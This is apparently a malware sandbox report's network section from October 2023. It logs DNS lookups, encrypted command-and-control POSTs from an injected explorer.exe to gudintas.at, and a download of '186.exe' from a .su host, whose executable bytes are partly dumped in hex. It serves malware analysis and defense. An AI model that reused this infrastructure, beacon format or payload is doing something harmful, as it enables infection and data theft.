                                                                    Oct 3, 2023 09:55:23.181235075 CEST8.8.8.8192.168.2.30xd23eNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:23.690687895 CEST8.8.8.8192.168.2.30x54c7No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:23.690687895 CEST8.8.8.8192.168.2.30x54c7No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:23.784531116 CEST8.8.8.8192.168.2.30xe13cNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:23.784531116 CEST8.8.8.8192.168.2.30xe13cNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.222821951 CEST8.8.8.8192.168.2.30xd596No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.222821951 CEST8.8.8.8192.168.2.30xd596No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.349270105 CEST8.8.8.8192.168.2.30x3d5fNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.349270105 CEST8.8.8.8192.168.2.30x3d5fNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.674904108 CEST8.8.8.8192.168.2.30x350No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.674904108 CEST8.8.8.8192.168.2.30x350No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.887358904 CEST8.8.8.8192.168.2.30xd66cNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:24.887358904 CEST8.8.8.8192.168.2.30xd66cNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:25.219521046 CEST8.8.8.8192.168.2.30xe1a4No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:25.219521046 CEST8.8.8.8192.168.2.30xe1a4No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:25.696755886 CEST8.8.8.8192.168.2.30xd6fdNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:25.696755886 CEST8.8.8.8192.168.2.30xd6fdNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:25.813055038 CEST8.8.8.8192.168.2.30xefdfNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:25.813055038 CEST8.8.8.8192.168.2.30xefdfNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:26.420981884 CEST8.8.8.8192.168.2.30x9f5cNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:26.420981884 CEST8.8.8.8192.168.2.30x9f5cNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:26.716892958 CEST8.8.8.8192.168.2.30xb258No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:26.716892958 CEST8.8.8.8192.168.2.30xb258No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.064409971 CEST8.8.8.8192.168.2.30x5389No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.064409971 CEST8.8.8.8192.168.2.30x5389No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.261826992 CEST8.8.8.8192.168.2.30x89baNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.261826992 CEST8.8.8.8192.168.2.30x89baNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.604238987 CEST8.8.8.8192.168.2.30xf3f0No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.604238987 CEST8.8.8.8192.168.2.30xf3f0No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.996993065 CEST8.8.8.8192.168.2.30x6204No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:27.996993065 CEST8.8.8.8192.168.2.30x6204No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:28.198657990 CEST8.8.8.8192.168.2.30xc8c5No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:28.198657990 CEST8.8.8.8192.168.2.30xc8c5No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:28.470315933 CEST8.8.8.8192.168.2.30x28c4No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:28.470315933 CEST8.8.8.8192.168.2.30x28c4No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:28.791251898 CEST8.8.8.8192.168.2.30xd304No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:28.791251898 CEST8.8.8.8192.168.2.30xd304No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.009104013 CEST8.8.8.8192.168.2.30xecebNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.009104013 CEST8.8.8.8192.168.2.30xecebNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.399643898 CEST8.8.8.8192.168.2.30x2145No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.399643898 CEST8.8.8.8192.168.2.30x2145No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.465882063 CEST8.8.8.8192.168.2.30x3aa6No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.465882063 CEST8.8.8.8192.168.2.30x3aa6No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.980228901 CEST8.8.8.8192.168.2.30xa97cNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:29.980228901 CEST8.8.8.8192.168.2.30xa97cNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:30.577316999 CEST8.8.8.8192.168.2.30x803aNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:30.577316999 CEST8.8.8.8192.168.2.30x803aNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:31.049436092 CEST8.8.8.8192.168.2.30xbef3No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:31.049436092 CEST8.8.8.8192.168.2.30xbef3No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:31.070185900 CEST8.8.8.8192.168.2.30xefd2No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:31.070185900 CEST8.8.8.8192.168.2.30xefd2No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:31.691574097 CEST8.8.8.8192.168.2.30x7e86No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:31.691574097 CEST8.8.8.8192.168.2.30x7e86No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:32.364126921 CEST8.8.8.8192.168.2.30xd0bdNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:32.364126921 CEST8.8.8.8192.168.2.30xd0bdNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:32.954849005 CEST8.8.8.8192.168.2.30xf22fNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:32.954849005 CEST8.8.8.8192.168.2.30xf22fNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:33.427095890 CEST8.8.8.8192.168.2.30x33d2No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:33.427095890 CEST8.8.8.8192.168.2.30x33d2No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:33.792503119 CEST8.8.8.8192.168.2.30x2a6aNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:33.792503119 CEST8.8.8.8192.168.2.30x2a6aNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:33.998126984 CEST8.8.8.8192.168.2.30xc479No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:33.998126984 CEST8.8.8.8192.168.2.30xc479No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:34.550575972 CEST8.8.8.8192.168.2.30x77f9No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:34.550575972 CEST8.8.8.8192.168.2.30x77f9No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:35.090553045 CEST8.8.8.8192.168.2.30x81aeNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:35.090553045 CEST8.8.8.8192.168.2.30x81aeNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:35.152399063 CEST8.8.8.8192.168.2.30x29c9No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:35.152399063 CEST8.8.8.8192.168.2.30x29c9No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:35.641345978 CEST8.8.8.8192.168.2.30xc84eNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:35.641345978 CEST8.8.8.8192.168.2.30xc84eNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:36.110250950 CEST8.8.8.8192.168.2.30xc103No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:36.110250950 CEST8.8.8.8192.168.2.30xc103No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:37.591631889 CEST8.8.8.8192.168.2.30xb02No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:37.591631889 CEST8.8.8.8192.168.2.30xb02No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:39.019612074 CEST8.8.8.8192.168.2.30x87c3No error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:39.019612074 CEST8.8.8.8192.168.2.30x87c3No error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:41.233681917 CEST8.8.8.8192.168.2.30xc3No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:41.233681917 CEST8.8.8.8192.168.2.30xc3No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:41.442833900 CEST8.8.8.8192.168.2.30x63faNo error (0)fiancejiveimp.fun104.21.81.17A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:41.442833900 CEST8.8.8.8192.168.2.30x63faNo error (0)fiancejiveimp.fun172.67.137.125A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:44.529648066 CEST8.8.8.8192.168.2.30x4b90No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:44.529648066 CEST8.8.8.8192.168.2.30x4b90No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:45.129997969 CEST8.8.8.8192.168.2.30x4a1bNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:45.129997969 CEST8.8.8.8192.168.2.30x4a1bNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:48.415349960 CEST8.8.8.8192.168.2.30xba7dNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:48.415349960 CEST8.8.8.8192.168.2.30xba7dNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:49.004322052 CEST8.8.8.8192.168.2.30xdb7dNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:49.004322052 CEST8.8.8.8192.168.2.30xdb7dNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:49.692514896 CEST8.8.8.8192.168.2.30xfadbNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:49.692514896 CEST8.8.8.8192.168.2.30xfadbNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:50.152053118 CEST8.8.8.8192.168.2.30x3910No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:50.152053118 CEST8.8.8.8192.168.2.30x3910No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:50.707289934 CEST8.8.8.8192.168.2.30x636aNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:50.707289934 CEST8.8.8.8192.168.2.30x636aNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:51.274168968 CEST8.8.8.8192.168.2.30x94c9No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:51.274168968 CEST8.8.8.8192.168.2.30x94c9No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:51.856251955 CEST8.8.8.8192.168.2.30x80ebNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:51.856251955 CEST8.8.8.8192.168.2.30x80ebNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:52.761389017 CEST8.8.8.8192.168.2.30x9435No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                    Oct 3, 2023 09:55:52.761389017 CEST8.8.8.8192.168.2.30x9435No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • vtqsod.com
                                                                      • gudintas.at
                                                                    • aughe.org
                                                                    • fviqib.net
                                                                    • cqexxjno.net
                                                                    • hjjvq.com
                                                                    • xgeyakiifw.net
                                                                    • ajhuadbjy.net
                                                                    • ptxqbvvyee.com
                                                                    • seqlxfb.org
                                                                    • ppidsxxc.net
                                                                    • julpewmqko.net
                                                                    • h170811.srv22.test-hf.su
                                                                    • uhjls.com
                                                                    • fiancejiveimp.fun
                                                                    • diludhd.com
                                                                    • 193.149.185.139
                                                                    • mqsawjuwq.net
                                                                    • malenursenect.fun

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.349803211.181.24.13380C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:54:20.108772993 CEST1534OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://vtqsod.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 187
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:54:20.108772993 CEST1534OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 46 e7 e3
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA .[k,vu4F_Ko]ftS7vdk\2i'u +(=YZmIn}"3NA7m3
                                                                    Oct 3, 2023 09:54:21.226350069 CEST1534INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:54:20 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 8
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 04 00 00 00 72 e8 85 ed
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.349804200.92.136.25480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:54:21.781431913 CEST1535OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://aughe.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 294
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:54:21.781454086 CEST1535OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 7c 0c ef fd
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vu|E@gSTVyk)u0oPmZUe=M[a|G)s'?/0uI6zBJ>) A-mfeXx
                                                                    Oct 3, 2023 09:54:22.573386908 CEST1536INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:54:22 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    10192.168.2.349815211.181.24.13380C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:05.547636986 CEST1565OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://julpewmqko.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 215
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:55:05.547779083 CEST1565OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 2e 0c b7 bf
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vu.PEvx]53cnU_|'_v_LNmH~5-?B,]\n6aq
                                                                    Oct 3, 2023 09:55:06.685908079 CEST1565INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:55:06 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 51
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 71 5a 3d 16 ac 69 5b b5 eb 55 e5 cc b0 e4 36 91 3d c1 b5 2b 5c 5b 9f 9f c0 9f 3c 82 70 10 0b 9a
                                                                    Data Ascii: #\qZ=i[U6=+\[<p


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    11192.168.2.34981691.227.16.2280C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:07.262130976 CEST1566OUTGET /186.exe HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Host: h170811.srv22.test-hf.su
                                                                    Oct 3, 2023 09:55:07.486428022 CEST1568INHTTP/1.1 200 OK
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 03 Oct 2023 07:55:07 GMT
                                                                    Content-Type: application/octet-stream
                                                                    Content-Length: 3413536
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    Last-Modified: Tue, 03 Oct 2023 06:43:12 GMT
                                                                    ETag: "341620-606ca345ebb95"
                                                                    Accept-Ranges: bytes
                                                                    X-Power-Supply-By: 220 Volt
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 d4 ac cf 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 c4 31 00 00 c2 01 00 00 00 00 00 1e e3 31 00 00 20 00 00 00 00 32 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 33 00 00 02 00 00 a6 70 34 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 d0 e2 31 00 4b 00 00 00 00 00 32 00 18 bf 01 00 00 00 00 00 00 00 00 00 00 88 33 00 20 8e 00 00 00 c0 33 00 0c 00 00 00 6b e2 31 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 c3 31 00 00 20 00 00 00 c4 31 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 bf 01 00 00 00 32 00 00 c0 01 00 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 33 00 00 02 00 00 00 86 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 31 00 00 00 00 00 48 00 00 00 02 00 05 00 68 44 04 00 00 90 0d 00 03 00 00 00 81 00 00 06 68 d4 11 00 1b 0c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3a 2b 05 28 c5 cc 35 45 02 28 13 00 00 0a 2a 00 56 2b 05 28 bc 2c 0e 3f 00 02 28 14 00 00 0a 38 00 00 00 00 00 2a 00 00 42 2b 05 28 bf 1c 4a 3a 7e 01 00 00 04 14 fe 01 2a 00 00 00 36 2b 05 28 66 a6 36 61 7e 01 00 00 04 2a 00 00 13 30 03 00 a4 00 00 00 01 00 00 11 2b 05 28 2a ee 4d 65 38 1e 00 00 00 fe 0c 00 00 45 04 00 00 00 2f 00 00 00 4b 00 00 00 6b 00 00 00 4a 00 00 00 38 2a 00 00 00 73 15 00 00 0a 80 02 00 00 04 38 00 00 00 00 73 16 00 00 0a 80 03 00 00 04 20 01 00 00 00 16 39 c2 ff ff ff 26 38 b8 ff ff ff 73 17 00 00 0a 80 05 00 00 04 20 02 00 00 00 17 3a a7 ff ff ff 26 38 9d ff ff ff 2a 73 18 00 00 0a 80 04 00 00 04 20 00 00 00 00 17 3a 8b ff ff ff 26 20 00 00 00 00 38 80 ff ff ff 73 19 00 00 0a 80 06 00 00 04 20 03 00 00 00 38 6c ff ff ff 13 30 03 00 5a 00 00 00 02 00 00 11 2b 05 28 da 57 30 5c 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 27 00 00 00 05 00 00 00 38 22 00 00 00 00 7e 02 00 00 04 6f 1a 00 00 0a 13 01 20 00 00 00 00 28 0c 00 00 06 39 d2 ff ff ff 26 38 c8 ff ff ff 38 05 00 00 00 38 00 00 00 00 11 01 